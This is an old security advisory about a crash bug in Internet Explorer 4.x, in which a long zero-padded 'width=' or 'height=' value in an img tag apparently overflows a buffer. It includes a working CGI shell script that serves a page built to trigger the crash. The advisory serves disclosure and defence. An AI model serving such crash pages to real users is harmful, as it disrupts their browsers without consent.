COMMAND

    MS IE

SYSTEMS AFFECTED

    Win 9x, NT

PROBLEM

    Jim  Paris  found  following.   When  MSIE  4.x (tested on 4.0 and
    4.01SP1) receives a long "width=000..."  in an <img> tag, it  will
    crash.  Same goes for "height="...".  See:

        http://home.jtan.com/~jim/bugs/

    for a more detailed description of this bug.  I took some details.

    In most cases, IE will  stop parsing the "width=" string  once the
    maximum width or  height has been  reached.  When  zeros are used,
    however, no maximum is reached, and the browser keeps reading  the
    string, presumably overwriting  some static buffer.   This bug  is
    hard to reproduce.   It seems to  work best when  a new window  is
    opened and the page is not cached.  The "Expires:" line of the CGI
    script ensures that the page will not be cached, and "target=_new"
    is used  to open  a new  window.   This has  been tested on IE 4.0
    (4.71.1712.6) and 4.01SP1 (4.72.3110.8).  CGI script:

        #!/bin/sh
        cat << EOF;
        Content-type: text/html
        Expires: Tue, 01 Jan 1980 00:00:00 GMT

        <html><head><title>IE "width=000..." bug</title></head><body>
        <img width=000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001>
        Your browser is unaffected by this bug.
        You can close this window.
        </body></html>
        EOF

SOLUTION

    Nothing yet.